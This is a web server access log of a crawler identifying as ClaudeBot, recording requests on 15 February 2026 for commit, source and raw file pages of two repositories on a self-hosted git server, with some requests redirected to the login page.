AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10888] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" [Client 216.73.216.188] [Length 9863] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" [Client 216.73.216.188] [Length 9878] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/package.json" [Client 216.73.216.188] [Length 11700] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 9879] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" [Client 216.73.216.188] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/index.html" [Client 216.73.216.188] [Length 2884] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/assets/css" [Client 216.73.216.188] [Length 9779] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/metadata.json?display=rendered" [Client 216.73.216.188] [Length 10871] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.gitignore" [Client 216.73.216.188] [Length 12200] [Gzip 3.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/docker-compose.yml" [Client 216.73.216.188] [Length 625] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/npm/data/logs" [Client 216.73.216.188] [Length 10225] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 9925] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/status.json" [Client 216.73.216.188] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/18fa480c84b358da8bf50d54057f53591759225f/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 10123] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/tsconfig.json" [Client 216.73.216.188] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.tsx" [Client 216.73.216.188] [Length 11647] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2FDOCKER_GUIDE.md" [Client 216.73.216.188] [Length 31304] [Gzip 9.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md" [Client 216.73.216.188] [Length 553] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" [Client 216.73.216.188] [Length 9943] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/index.html" [Client 216.73.216.188] [Length 10322] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/templates/favicon.ico" [Client 216.73.216.188] [Length 70274] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/README.md?display=source" [Client 216.73.216.188] [Length 11757] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2F.gitignore" [Client 216.73.216.188] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py?display=rendered" [Client 216.73.216.188] [Length 10886] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/README.md" [Client 216.73.216.188] [Length 11340] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Febd2be03a23e76e126207d40a257d72f40ab9a7c%2Fhtml%2Fservices" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fmetadata.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/types.ts" [Client 216.73.216.188] [Length 11521] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx?display=source" [Client 216.73.216.188] [Length 12798] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/index.html" [Client 216.73.216.188] [Length 21812] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcUaMinimal%2Fobj%2FDebug%2Fnet8.0%2FOpcUaMinimal.assets.cache" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/index.html" [Client 216.73.216.188] [Length 21800] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/index.html?display=rendered" [Client 216.73.216.188] [Length 10875] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/types.ts" [Client 216.73.216.188] [Length 11518] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/services" [Client 216.73.216.188] [Length 9957] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fadf9a81cb0ea52c9fa32f352b5800e021665bb47%2F.TemporaryDocument" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/status.json" [Client 216.73.216.188] [Length 11078] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/status.json?display=rendered" [Client 216.73.216.188] [Length 10889] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2Fhtml%2Fcomponents%2FChatBot.tsx" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/asset_pilot_docker.tar.gz" [Client 216.73.216.188] [Length 10893] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/.env.local" [Client 216.73.216.188] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Findex.html" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F7e5f452449b5385fa46a3a589ed6aac00a02734a%2F.Backup%2Fdocker-compose.yml" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" [Client 216.73.216.188] [Length 11072] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/services" [Client 216.73.216.188] [Length 9952] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 11303] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F66e18d23c91cd4d290b6cecfdc88680af2fb97e2%2F.Backup%2Fstatus.json" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Contact.tsx" [Client 216.73.216.188] [Length 16460] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/update_status.py" [Client 216.73.216.188] [Length 9884] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/About.tsx" [Client 216.73.216.188] [Length 13919] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" [Client 216.73.216.188] [Length 11296] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Hero.tsx" [Client 216.73.216.188] [Length 13867] [Gzip 3.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:17:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components/Footer.tsx" [Client 216.73.216.188] [Length 14188] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2F18fa480c84b358da8bf50d54057f53591759225f%2Fasset_pilot_docker%2Fapp" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F998d733eb52423ffff2f8602efdfb1282198a61f%2Fhtml%2Fcomponents" [Client 216.73.216.188] [Length 4849] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fd4f1ca87ab7f1292db644da6b64b8d099a6c8e96%2Fasset_pilot_docker" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2FAssetPilot%2Fsrc%2Fcommit%2Fd4f1ca87ab7f1292db644da6b64b8d099a6c8e96%2Fasset_pilot_docker%2Fstatic" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2F6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d%2Fhtml%2Fassets" [Client 216.73.216.188] [Length 4854] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fhomepage%2Fsrc%2Fcommit%2Fa0a212e41c7ebc2699ea736d71d145b9844673ec%2F.Backup%2Fhtml%2FApp.tsx" [Client 216.73.216.188] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html" [Client 216.73.216.188] [Length 9864] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/App.tsx?display=rendered" [Client 216.73.216.188] [Length 10906] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 12788] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/App.tsx" [Client 216.73.216.188] [Length 12784] [Gzip 4.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:18:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr 